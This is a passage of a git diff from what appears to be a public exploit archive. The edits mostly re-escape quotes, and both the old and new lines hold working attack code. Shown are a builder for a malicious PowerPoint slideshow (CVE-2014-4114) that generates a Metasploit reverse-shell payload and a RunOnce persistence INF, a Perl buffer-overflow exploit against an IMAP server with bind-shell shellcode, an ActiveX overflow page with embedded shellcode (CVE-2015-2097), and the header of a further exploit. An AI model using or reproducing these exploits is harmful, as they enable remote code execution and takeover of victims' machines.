ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>'
+    xml = \'<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\'
+    xml = xml + \'<Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"><Default Extension=\"xml\" ContentType=\"application/xml\"/><Default Extension=\"jpeg\" ContentType=\"image/jpeg\"/><Default Extension=\"bin\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.printerSettings\"/><Default Extension=\"vml\" ContentType=\"application/vnd.openxmlformats-officedocument.vmlDrawing\"/><Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/><Default Extension=\"wmf\" ContentType=\"image/x-wmf\"/><Override PartName=\"/ppt/presentation.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml\"/><Override PartName=\"/ppt/slideMasters/slideMaster1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml\"/><Override PartName=\"/ppt/slides/slide1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slide+xml\"/><Override PartName=\"/ppt/presProps.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.presProps+xml\"/><Override PartName=\"/ppt/viewProps.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml\"/><Override PartName=\"/ppt/theme/theme1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.theme+xml\"/><Override PartName=\"/ppt/tableStyles.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout2.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout3.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout4.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout5.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout6.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout7.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout8.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout9.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout10.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout11.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/embeddings/oleObject1.bin\" ContentType=\"application/vnd.openxmlformats-officedocument.oleObject\"/><Override PartName=\"/ppt/embeddings/oleObject2.bin\" ContentType=\"application/vnd.openxmlformats-officedocument.oleObject\"/><Override PartName=\"/docProps/core.xml\" ContentType=\"application/vnd.openxmlformats-package.core-properties+xml\"/><Override PartName=\"/docProps/app.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.extended-properties+xml\"/></Types>\'
  
     return xml
 	
 # build remotely hosted inf file 
 def build_inf(gif):
-    exe = gif.split('.')[0] + '.exe'
-    inf = '[Version]\n'
-    inf = inf + 'Signature = "$CHICAGO$"\n'
-    inf = inf + 'Class=61883\n'
-    inf = inf + 'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n'
-    inf = inf + 'Provider=%Microsoft%\n'
-    inf = inf + 'DriverVer=06/21/2006,6.1.7600.16385\n'
-    inf = inf + '[DestinationDirs]\n'
-    inf = inf + 'DefaultDestDir = 1\n'
-    inf = inf + '[DefaultInstall]\n'
-    inf = inf + 'RenFiles = RxRename\n'
-    inf = inf + 'AddReg = RxStart\n'
-    inf = inf + '[RxRename]\n'
-    inf = inf + exe + ', ' + gif + '\n'
-    inf = inf + '[RxStart]\n'
-    inf = inf + 'HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\' + exe
+    exe = gif.split(\'.\')[0] + \'.exe\'
+    inf = \'[Version]\\n\'
+    inf = inf + \'Signature = \"$CHICAGO$\"\\n\'
+    inf = inf + \'Class=61883\\n\'
+    inf = inf + \'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\\n\'
+    inf = inf + \'Provider=%Microsoft%\\n\'
+    inf = inf + \'DriverVer=06/21/2006,6.1.7600.16385\\n\'
+    inf = inf + \'[DestinationDirs]\\n\'
+    inf = inf + \'DefaultDestDir = 1\\n\'
+    inf = inf + \'[DefaultInstall]\\n\'
+    inf = inf + \'RenFiles = RxRename\\n\'
+    inf = inf + \'AddReg = RxStart\\n\'
+    inf = inf + \'[RxRename]\\n\'
+    inf = inf + exe + \', \' + gif + \'\\n\'
+    inf = inf + \'[RxStart]\\n\'
+    inf = inf + \'HKLM,Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce,Install,,%1%\\\\\' + exe
  
     return inf
 
@@ -148,10 +148,10 @@ def build_presentation(filename):
 
 # build metasploit meterpreter reverse_tcp payload	
 def build_msfpayload(ip, port, file):
-    cmd = 'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s' % (ip, port, file)
+    cmd = \'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s\' % (ip, port, file)
     run_cmd= subprocess.check_output(cmd, shell=True)
     subprocess.call(run_cmd, shell=True)
-    print '[*] Meterpreter Reverse TCP EXE [%s] created.' % (file)
+    print \'[*] Meterpreter Reverse TCP EXE [%s] created.\' % (file)
  
     
 #################################################
@@ -160,33 +160,33 @@ def build_msfpayload(ip, port, file):
  
 def main():
     print
-    print '============================================================================='
-    print '|    PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114)        |'
-    print '|               Author: Mike Czumak (T_v3rn1x) - @SecuritySift              |' 
-    print '=============================================================================\n'
+    print \'=============================================================================\'
+    print \'|    PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114)        |\'
+    print \'|               Author: Mike Czumak (T_v3rn1x) - @SecuritySift              |\' 
+    print \'=============================================================================\\n\'
 	
     args = get_args() # get the cl args 
     ip = args.ip 
-    share = "share"
-    ole1 = "oleObject1.bin"
-    ole2 = "oleObject2.bin"
-    vml = "vmlDrawing1.vml"
-    pptx = "tmp.pptx"
-    gif = "slide1.gif"
-    inf = "slides.inf"
+    share = \"share\"
+    ole1 = \"oleObject1.bin\"
+    ole2 = \"oleObject2.bin\"
+    vml = \"vmlDrawing1.vml\"
+    pptx = \"tmp.pptx\"
+    gif = \"slide1.gif\"
+    inf = \"slides.inf\"
     
     # build meterpreter reverse tcp gif file (optional)
     if args.msf:
-        print "[i] Building metasploit reverse_tcp executable"
+        print \"[i] Building metasploit reverse_tcp executable\"
         build_msfpayload(args.ip, args.msf, gif)
  
     # build the bin, inf and vml files
-    gif_bin = build_bin("EmbeddedStg1.txt", ip, share, gif)
-    inf_bin = build_bin("EmbeddedStg2.txt", ip, share, inf)
+    gif_bin = build_bin(\"EmbeddedStg1.txt\", ip, share, gif)
+    inf_bin = build_bin(\"EmbeddedStg2.txt\", ip, share, inf)
     draw_vml = build_vml()
     rem_inf = build_inf(gif)
     write_file(inf, rem_inf)
-    print ("[*] INF file [%s] created " % inf)
+    print (\"[*] INF file [%s] created \" % inf)
  
     # build the xml files
     xml_rel = build_xml_rels(ole1, ole2)
@@ -195,29 +195,29 @@ def main():
  
     # build blank temp pptx presentation to convert to ppsx
     build_presentation(pptx)
-    zippptx = pptx + ".zip"
+    zippptx = pptx + \".zip\"
     os.rename(pptx, zippptx) # rename to zip for modification
     
     # open temp pptx and a copy for modification
-    zin = zipfile.ZipFile(zippptx, 'r')
-    zippptx_copy = "copy_" + zippptx
-    zout = zipfile.ZipFile(zippptx_copy, "w")
+    zin = zipfile.ZipFile(zippptx, \'r\')
+    zippptx_copy = \"copy_\" + zippptx
+    zout = zipfile.ZipFile(zippptx_copy, \"w\")
  
     # modify the pptx template with exploit
     for item in zin.infolist():
-        if (item.filename == "ppt/slides/slide1.xml"): 
+        if (item.filename == \"ppt/slides/slide1.xml\"): 
             zout.writestr(item, xml_slide1) # replace slide 1 contents
-        elif (item.filename == "ppt/slides/_rels/slide1.xml.rels"):
+        elif (item.filename == \"ppt/slides/_rels/slide1.xml.rels\"):
             zout.writestr(item, xml_rel) # replace slide 1 rels
-        elif (item.filename == "[Content_Types].xml"):
+        elif (item.filename == \"[Content_Types].xml\"):
             zout.writestr(item, xml_content) # replace content_types
         else:
             buffer = zin.read(item.filename) 
             zout.writestr(item,buffer) # use existing file
     
-    zout.writestr("ppt/embeddings/" + ole1, gif_bin)
-    zout.writestr("ppt/embeddings/"+ole2, inf_bin)
-    zout.writestr("ppt/drawings/vmlDrawing1.vml", draw_vml)
+    zout.writestr(\"ppt/embeddings/\" + ole1, gif_bin)
+    zout.writestr(\"ppt/embeddings/\"+ole2, inf_bin)
+    zout.writestr(\"ppt/drawings/vmlDrawing1.vml\", draw_vml)
     zout.close()
     zin.close()
     
@@ -225,9 +225,9 @@ def main():
     os.rename(zippptx_copy, args.filename)
     os.remove(zippptx)
     
-    print ("[*] Exploit PPSX file [%s] created" % (args.filename))		
-    print ("[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called 'share'" % (gif))		
+    print (\"[*] Exploit PPSX file [%s] created\" % (args.filename))		
+    print (\"[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called \'share\'\" % (gif))		
     print
  
-if __name__ == '__main__':
+if __name__ == \'__main__\':
 	main()
\ No newline at end of file
diff --git a/platforms/windows/remote/3561.pl b/platforms/windows/remote/3561.pl
index 1e22b135f..1b86bedea 100755
--- a/platforms/windows/remote/3561.pl
+++ b/platforms/windows/remote/3561.pl
@@ -9,16 +9,16 @@ use IO::Socket::INET;
 use Switch;
 
 if (@ARGV < 3) {
-print "--------------------------------------------------------------------\n";
-print "Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\n";
-print " Return address: \n";
-print " 1 - Windows 2k Sp4 English Version\n";
-print " 2 - Windows 2k Sp4 Italian Version\n";
-print " 3 - Windows XP Sp1 English Version\n";
-print " 4 - Windows XP Sp0 English Version\n";
-print " If values not specified, Windows 2k Sp4 will be used.\n";
-print " Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\n";
-print "--------------------------------------------------------------------\n";
+print \"--------------------------------------------------------------------\\n\";
+print \"Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\\n\";
+print \" Return address: \\n\";
+print \" 1 - Windows 2k Sp4 English Version\\n\";
+print \" 2 - Windows 2k Sp4 Italian Version\\n\";
+print \" 3 - Windows XP Sp1 English Version\\n\";
+print \" 4 - Windows XP Sp0 English Version\\n\";
+print \" If values not specified, Windows 2k Sp4 will be used.\\n\";
+print \" Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\\n\";
+print \"--------------------------------------------------------------------\\n\";
 }
 
 use IO::Socket::INET;
@@ -27,9 +27,9 @@ my $host = 10.0.0.2;
 my $port = 143;
 my $reply;
 my $request;
-my $jmp="\xe9\x02\xff\xff\xff";
+my $jmp=\"\\xe9\\x02\\xff\\xff\\xff\";
 
-my $nextseh = "\x90\x90\xeb\x09";
+my $nextseh = \"\\x90\\x90\\xeb\\x09\";
 
 
 
@@ -37,19 +37,19 @@ my $nextseh = "\x90\x90\xeb\x09";
 #1)bind port, in this exploit is 4444 in the original shellcode was 6666
 #2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
 my $shellcode = 
-"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
-"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
-"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
-"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
-"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
-"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
-"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
-"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
-"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
-"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
-"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
-"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
-"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
+\"\\x59\\x81\\xc9\\xd3\\x62\\x30\\x20\\x41\\x43\\x4d\\x64\".
+\"\\x64\\x99\\x96\\x8D\\x7E\\xE8\\x64\\x8B\\x5A\\x30\\x8B\\x4B\\x0C\\x8B\\x49\\x1C\".
+\"\\x8B\\x09\\x8B\\x69\\x08\\xB6\\x03\\x2B\\xE2\\x66\\xBA\\x33\\x32\\x52\\x68\\x77\".
+\"\\x73\\x32\\x5F\\x54\\xAC\\x3C\\xD3\\x75\\x06\\x95\\xFF\\x57\\xF4\\x95\\x57\\x60\".
+\"\\x8B\\x45\\x3C\\x8B\\x4C\\x05\\x78\\x03\\xCD\\x8B\\x59\\x20\\x03\\xDD\\x33\\xFF\".
+\"\\x47\\x8B\\x34\\xBB\\x03\\xF5\\x99\\xAC\\x34\\x71\\x2A\\xD0\\x3C\\x71\\x75\\xF7\".
+\"\\x3A\\x54\\x24\\x1C\\x75\\xEA\\x8B\\x59\\x24\\x03\\xDD\\x66\\x8B\\x3C\\x7B\\x8B\".
+\"\\x59\\x1C\\x03\\xDD\\x03\\x2C\\xBB\\x95\\x5F\\xAB\\x57\\x61\\x3B\\xF7\\x75\\xB4\".
+\"\\x5E\\x54\\x6A\\x02\\xAD\\xFF\\xD0\\x88\\x46\\x13\\x8D\\x48\\x30\\x8B\\xFC\\xF3\".
+\"\\xAB\\x40\\x50\\x40\\x50\\xAD\\xFF\\xD0\\x95\\xB8\\x02\\xFF\\x11\\x5c\\x32\\xE4\".
+\"\\x50\\x54\\x55\\xAD\\xFF\\xD0\\x85\\xC0\\x74\\xF8\\xFE\\x44\\x24\\x2D\\xFE\\x44\".
+\"\\x24\\x2c\\x83\\xEF\\x6C\\xAB\\xAB\\xAB\\x58\\x54\\x54\\x50\\x50\\x50\\x54\\x50\".
+\"\\x50\\x56\\x50\\xFF\\x56\\xE4\\xFF\\x56\\xE8\";
 
 
 
@@ -57,61 +57,61 @@ my $shellcode =
 
 
 foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);
 $seh = $1 if ($_=~/-o(.*)/);
 $happy = $1 if ($_=~/-o(.*)/);
 }
 
 switch ($seh) {
-case 1 { $seh="\x43\x8f\x2d\x7c" } # Win2k SP4 English version jmp ebx in advapi32.dll
-case 2 { $seh="\x43\x8f\x26\x79" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
-case 3 { $seh="\xc0\x5f\x3c\x76" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
-case 4 { $seh="\xfc\x61\x3c\x76" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
+case 1 { $seh=\"\\x43\\x8f\\x2d\\x7c\" } # Win2k SP4 English version jmp ebx in advapi32.dll
+case 2 { $seh=\"\\x43\\x8f\\x26\\x79\" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
+case 3 { $seh=\"\\xc0\\x5f\\x3c\\x76\" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
+case 4 { $seh=\"\\xfc\\x61\\x3c\\x76\" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll
 }
 
 
 switch ($happy) {
-case 1 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 English version
-case 2 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 Italian version
-case 3 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP1 version
-case 4 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP0 version
+case 1 { $happy=\"\\x8d\\x83\\x34\\xff\\xff\\xff\\x50\\xc3\" } # Win2k SP4 English version
+case 2 { $happy=\"\\x8d\\x83\\x34\\xff\\xff\\xff\\x50\\xc3\" } # Win2k SP4 Italian version
+case 3 { $happy=\"\\x8b\\xc1\\x66\\x05\\x34\\x29\\x50\\xc3\" } # WinXP Pro English SP1 version
+case 4 { $happy=\"\\x8b\\xc1\\x66\\x05\\x34\\x29\\x50\\xc3\" } # WinXP Pro English SP0 version
 }
 
-my $request ="1 LOGIN".(" "x948)."\{255\}\n";
+my $request =\"1 LOGIN\".(\" \"x948).\"\\{255\\}\\n\";
 
 
 
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
-$socket or die "Cannot connect to host!\n";
+my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$host, PeerPort=>$port);
+$socket or die \"Cannot connect to host!\\n\";
 
 recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
+print \"Response:\" . $reply;
 
 send $socket, $request, 0;
-print "[+] Sent 1st request\n";
+print \"[+] Sent 1st request\\n\";
 recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
+print \"Response:\" . $reply;
 sleep(1);
 
 
 
-my $request ="\x41" x 255;
+my $request =\"\\x41\" x 255;
 
 send $socket, $request, 0;
-print "[+] Sent 2nd request\n";
+print \"[+] Sent 2nd request\\n\";
 sleep(1);
 
-my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
+my $request=(\"\\x45\" x7420).(\"\\x90\" x10).$happy.(\"\\x90\" x14).$shellcode.(\"\\x41\" x8).$nextseh.$seh.(\"\\x90\" x5).$jmp.(\"\\x90\" x533);
 
 send $socket, $request, 0;
-print "[+] Sent final request\n";
+print \"[+] Sent final request\\n\";
 sleep(1);
 
 close($socket);
 
-print " + connect on port 4444 of $host ...\n";
+print \" + connect on port 4444 of $host ...\\n\";
 sleep(3);
-system("telnet $host 4444");
+system(\"telnet $host 4444\");
 exit;
 
 # milw0rm.com [2007-03-24]
diff --git a/platforms/windows/remote/36602.html b/platforms/windows/remote/36602.html
index 33c79600d..b3d55562e 100755
--- a/platforms/windows/remote/36602.html
+++ b/platforms/windows/remote/36602.html
@@ -9,9 +9,9 @@
 # Tested on: Windows XP SP3 using IE6/7/8
 # CVE : 2015-2097
 
-targetFile = "C:\Windows\System32\WESPSDK\WESPConfig.dll"
-prototype  = "Function ChangePassword ( ByVal oldPwd As String ,  ByVal newPwd As String ) As Integer"
-progid     = "WESPCONFIGLib.UserItem"
+targetFile = \"C:\\Windows\\System32\\WESPSDK\\WESPConfig.dll\"
+prototype  = \"Function ChangePassword ( ByVal oldPwd As String ,  ByVal newPwd As String ) As Integer\"
+progid     = \"WESPCONFIGLib.UserItem\"
 Tested on IE6/7/8
 Author: Praveen Darshanam
 http://darshanams.blogspot.com/
@@ -19,66 +19,66 @@ http://blog.disects.com/
 P.S. Do not remove back slashes in shellcode and other variables
 -->
 
-<object classid='clsid:9B61891E-D876-476E-B1E8-AA662F332004' id='target'>
+<object classid=\'clsid:9B61891E-D876-476E-B1E8-AA662F332004\' id=\'target\'>
 </object>
 <script>
 
-var arg1 = "";
-var arg2 = "PraveenD";
+var arg1 = \"\";
+var arg2 = \"PraveenD\";
 
-var nops = "";
-var shellcode = "";
-var buff2 = "";
+var nops = \"\";
+var shellcode = \"\";
+var buff2 = \"\";
 
 for (i=0; i<248; i++)
 {
-	arg1 += "B";
+	arg1 += \"B\";
 }
-var nseh = "\xeb\x10PD";
+var nseh = \"\\xeb\\x10PD\";
 //WESPConfig.dll(0x10022f35 = pop pop pop ret)
-var seh = "\x3d\x2f\x02\x10";
+var seh = \"\\x3d\\x2f\\x02\\x10\";
 for (i=0;i<80; i++)
 {
-	nops += "\x90";
+	nops += \"\\x90\";
 }
-shellcode = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
-"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
-"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
-"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
-"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
-"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
-"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
-"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
-"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
-"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
-"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
-"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
-"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
-"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
-"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
-"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
-"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
-"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
-"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
-"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
-"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
-"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
-"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
-"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
-"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
-"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
-"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
-"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
-"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
-"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
-"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
-"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
-"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
-"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
-"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
+shellcode = \"\\x54\\x5d\\xda\\xc9\\xd9\\x75\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\" +
+\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\" +
+\"\\x56\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\" +
+\"\\x30\\x41\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\" +
+\"\\x32\\x42\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\" +
+\"\\x49\\x4b\\x4c\\x5a\\x48\\x4b\\x32\\x45\\x50\\x55\\x50\\x43\\x30\" +
+\"\\x53\\x50\\x4b\\x39\\x4d\\x35\\x30\\x31\\x4f\\x30\\x52\\x44\\x4c\" +
+\"\\x4b\\x56\\x30\\x46\\x50\\x4c\\x4b\\x31\\x42\\x34\\x4c\\x4c\\x4b\" +
+\"\\x31\\x42\\x44\\x54\\x4c\\x4b\\x32\\x52\\x47\\x58\\x54\\x4f\\x38\" +
+\"\\x37\\x50\\x4a\\x37\\x56\\x46\\x51\\x4b\\x4f\\x4e\\x4c\\x57\\x4c\" +
+\"\\x35\\x31\\x33\\x4c\\x33\\x32\\x46\\x4c\\x37\\x50\\x49\\x51\\x48\" +
+\"\\x4f\\x34\\x4d\\x45\\x51\\x4f\\x37\\x4d\\x32\\x4a\\x52\\x36\\x32\" +
+\"\\x46\\x37\\x4c\\x4b\\x36\\x32\\x32\\x30\\x4c\\x4b\\x30\\x4a\\x37\" +
+\"\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x54\\x38\\x5a\\x43\\x51\\x58\" +
+\"\\x33\\x31\\x4e\\x31\\x30\\x51\\x4c\\x4b\\x36\\x39\\x47\\x50\\x53\" +
+\"\\x31\\x48\\x53\\x4c\\x4b\\x30\\x49\\x35\\x48\\x5a\\x43\\x36\\x5a\" +
+\"\\x57\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x33\\x31\\x49\\x46\\x56\" +
+\"\\x51\\x4b\\x4f\\x4e\\x4c\\x49\\x51\\x38\\x4f\\x54\\x4d\\x35\\x51\" +
+\"\\x58\\x47\\x37\\x48\\x4d\\x30\\x34\\x35\\x4a\\x56\\x43\\x33\\x43\" +
+\"\\x4d\\x5a\\x58\\x37\\x4b\\x43\\x4d\\x46\\x44\\x43\\x45\\x4d\\x34\" +
+\"\\x56\\x38\\x4c\\x4b\\x56\\x38\\x31\\x34\\x43\\x31\\x4e\\x33\\x42\" +
+\"\\x46\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x36\\x38\\x45\\x4c\" +
+\"\\x45\\x51\\x4e\\x33\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x33\\x31\\x48\" +
+\"\\x50\\x4c\\x49\\x57\\x34\\x36\\x44\\x51\\x34\\x51\\x4b\\x51\\x4b\" +
+\"\\x33\\x51\\x30\\x59\\x50\\x5a\\x36\\x31\\x4b\\x4f\\x4b\\x50\\x31\" +
+\"\\x4f\\x51\\x4f\\x51\\x4a\\x4c\\x4b\\x42\\x32\\x5a\\x4b\\x4c\\x4d\" +
+\"\\x31\\x4d\\x53\\x5a\\x35\\x51\\x4c\\x4d\\x4c\\x45\\x58\\x32\\x43\" +
+\"\\x30\\x53\\x30\\x55\\x50\\x56\\x30\\x42\\x48\\x50\\x31\\x4c\\x4b\" +
+\"\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x59\\x45\\x4f\\x4b\\x5a\\x50\\x48\" +
+\"\\x35\\x4f\\x52\\x30\\x56\\x53\\x58\\x4e\\x46\\x5a\\x35\\x4f\\x4d\" +
+\"\\x4d\\x4d\\x4b\\x4f\\x38\\x55\\x47\\x4c\\x53\\x36\\x33\\x4c\\x45\" +
+\"\\x5a\\x4b\\x30\\x4b\\x4b\\x4b\\x50\\x43\\x45\\x43\\x35\\x4f\\x4b\" +
+\"\\x47\\x37\\x32\\x33\\x53\\x42\\x42\\x4f\\x42\\x4a\\x55\\x50\\x46\" +
+\"\\x33\\x4b\\x4f\\x49\\x45\\x43\\x53\\x53\\x51\\x52\\x4c\\x52\\x43\" +
+\"\\x36\\x4e\\x55\\x35\\x44\\x38\\x33\\x55\\x33\\x30\\x41\\x41\";
 for (i=0;i<(5000 - (arg1.length + nseh.length + seh.length + nops.length + shellcode.length)); i++)
 {
-	buff2 += "A";
+	buff2 += \"A\";
 }
 
 fbuff = arg1 + nseh + seh + nops + shellcode + buff2;
diff --git a/platforms/windows/remote/3680.sh b/platforms/windows/remote/3680.sh
index d5dc25d54..e9321e963 100755
--- a/platforms/windows/remote/3680.sh
+++ b/platforms/windows/remote/3680.sh
@@ -17,7 +17,7 @@
 # Vulnerability discovered by Mark Dowd.
 # CVE-2006-3747
 # 
-# first POC by jack <jack\x40gulcas\x2Eorg>
+# first POC by jack <jack\\x40gulcas\\x2Eorg>
